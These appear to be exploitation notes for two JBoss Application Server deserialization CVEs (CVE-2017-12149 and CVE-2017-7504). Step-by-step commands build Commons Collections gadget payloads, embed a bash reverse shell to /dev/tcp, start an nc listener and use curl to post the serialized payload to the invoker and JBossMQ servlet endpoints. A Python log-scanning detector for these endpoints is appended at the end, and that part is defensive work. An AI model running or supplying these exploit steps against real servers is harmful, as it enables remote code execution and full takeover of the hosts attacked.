JBoss Application Server deserialization vulnerabilities
CVE-2017-12149
http://192.168.11.123:8080/invoker/readonly
1: Build the tool that generates the binary payload file
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
2: Set the IP address and port of the host that receives the shell
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:port
3: Open a new terminal and start a listener
nc -vv -l 4444
4: Use curl to send the attack payload to the target server.
curl http://192.168.11.123:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
CVE-2017-7504
http://192.168.112.132:8080/jbossmq-httpil/HTTPServerILServlet/
Usage example:
1)
javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1.java
2)
java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1 '/bin/bash -i>&/dev/tcp/ip/port<&1'
3)
nc -lvvp 4444
4)
curl http://192.168.112.132:8080/jbossmq-httpil/HTTPServerILServlet/ --data-binary @ExampleCommonsCollections1.ser
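
Added example, not part of the original notes: a defender-side check for the two endpoints above. It flags POST requests to /invoker/readonly and /jbossmq-httpil/HTTPServerILServlet in access-log lines and recognises a request body that starts with the Java serialization stream header. The common/combined log format, the function names and the sample lines are assumptions constructed for this example.

```python
import re
from urllib.parse import unquote

# Endpoints from this page that take a serialized Java object in the POST body.
WATCHED_PATHS = {"/invoker/readonly", "/jbossmq-httpil/HTTPServerILServlet"}

# Java serialization stream header: magic 0xACED followed by version 0x0005.
JAVA_SER_MAGIC = b"\xac\xed\x00\x05"

# Assumption: access log in common/combined format.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def is_java_serialized(body: bytes) -> bool:
    """True if a captured request body starts with the serialization header."""
    return body.startswith(JAVA_SER_MAGIC)

def normalize(path: str) -> str:
    """Drop the query string, decode %xx, collapse repeated and trailing slashes."""
    path = unquote(path.split("?", 1)[0])
    return re.sub(r"/+", "/", path).rstrip("/")

def flag_requests(lines):
    """Return (source, path, status) for every POST to a watched endpoint."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and m["method"] == "POST" and normalize(m["path"]) in WATCHED_PATHS:
            hits.append((m["src"], normalize(m["path"]), m["status"]))
    return hits

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 1024',
    '10.0.0.9 - - [12/Mar/2024:10:01:07 +0000] "POST /invoker/readonly HTTP/1.1" 500 2011',
    '10.0.0.9 - - [12/Mar/2024:10:01:09 +0000] "POST //jbossmq-httpil/HTTPServerILServlet/ HTTP/1.1" 200 0',
    '10.0.0.7 - - [12/Mar/2024:10:02:00 +0000] "POST /app/login HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for hit in flag_requests(SAMPLE_LOG):
        print("suspicious POST:", hit)
```

Access logs only show the request path, so the body check is meant for a proxy, WAF or packet capture that can see request bodies.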